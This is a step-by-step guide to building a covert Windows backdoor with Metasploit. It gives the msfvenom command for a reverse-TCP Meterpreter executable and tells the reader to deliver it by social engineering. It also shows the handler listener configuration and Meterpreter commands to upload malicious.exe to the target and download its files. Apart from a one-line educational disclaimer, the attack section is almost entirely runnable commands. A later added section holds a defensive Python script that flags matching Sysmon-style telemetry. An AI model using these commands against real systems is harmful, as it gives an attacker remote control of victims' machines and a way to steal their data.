Crafting Backdoors with Metasploit

Disclaimer: This guide is for educational purposes only. Unauthorized use of these techniques for hacking activities is illegal.

Metasploit is a core penetration-testing framework that provides an environment for building and deploying backdoor payloads. This guide covers payload creation with msfvenom, listener setup, and file transfer over a Meterpreter session.

Lab Setup

Network Layout:

  • Attacker: Kali Linux

    • IP: 10.0.1.50
  • Target: Windows 10/11

    • IP: 10.0.1.20

Building a Covert Backdoor with msfvenom

Step 1: Generate the Payload

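Create a reverse TCP payload in EXE format that connects back to the attacker machine. The command as written applies no encoder, so the output is the stock msfvenom executable: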

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.50 LPORT=4444 -f exe > /root/hidden_backdoor.exe

Step 2: Deploy the Payload

Transfer hidden_backdoor.exe to the Windows machine using social engineering tactics.

Step 3: Initiate the Listener

Configure Metasploit to listen for the payload's connection:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.50
set LPORT 4444
exploit

Executing the backdoor on the target system will initiate a Meterpreter session.

Transferring Files with Meterpreter

With an active Meterpreter session, you can easily transfer files.

Upload Files to the Target

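Ensure the Meterpreter session is active. If the session has closed, restart the handler as in Step 3 and wait for the payload to connect again: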

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.50
set LPORT 4444
exploit

Transfer a file:

upload /root/malicious.exe C:\\Users\\Public\\malicious.exe

Download Files from the Target

Retrieve a file:

download C:\\Users\\Public\\data.txt /root/data.txt

Useful Meterpreter Commands

  • List Files:

      ls
    
  • Change Directory:

      cd C:\\Users\\Public
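
Seen from the defending side, the callback in Step 3 and the upload to C:\Users\Public leave correlated telemetry on the target. The following added example (not part of the original guide) triages constructed Sysmon-style records; the record layout, the user name and every path other than those shown on this page are assumptions.

```python
from collections import defaultdict

# Constructed Sysmon-style records (Event ID 3 = network connection,
# Event ID 11 = file create). Users and paths are sample values;
# 10.0.1.50:4444 is the listener from the lab setup on this page.
EVENTS = [
    {"id": 3, "Image": r"C:\Users\alice\Downloads\hidden_backdoor.exe",
     "DestinationIp": "10.0.1.50", "DestinationPort": 4444},
    {"id": 11, "Image": r"C:\Users\alice\Downloads\hidden_backdoor.exe",
     "TargetFilename": r"C:\Users\Public\malicious.exe"},
    {"id": 3, "Image": r"C:\Users\alice\AppData\Local\Programs\app\updater.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
    {"id": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
    {"id": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\Public\notes.txt"},
]

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".scr")


def in_user_path(path):
    """True when the path is in a location a standard user can write to."""
    return path.lower().startswith(USER_WRITABLE)


def triage(events):
    """Map each suspicious image to 'high' (connects out AND drops an
    executable into a user-writable path) or 'low' (only one of the two)."""
    seen = defaultdict(set)
    for e in events:
        img = e["Image"]
        if not in_user_path(img):
            continue  # installed software under Program Files / Windows
        if e["id"] == 3:
            seen[img].add("net")
        elif e["id"] == 11:
            tgt = e["TargetFilename"].lower()
            if in_user_path(tgt) and tgt.endswith(EXEC_EXT):
                seen[img].add("drop")
    return {img: "high" if tags == {"net", "drop"} else "low"
            for img, tags in seen.items() if tags}


if __name__ == "__main__":
    for image, severity in triage(EVENTS).items():
        print(severity, image)
```

The rule keys on image path and behaviour rather than on port 4444, because LPORT is set by whoever builds the payload.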
    

Summary

Using Metasploit, you can create and deploy backdoors, and manage files efficiently with Meterpreter. Always adhere to ethical guidelines and legal requirements during penetration testing.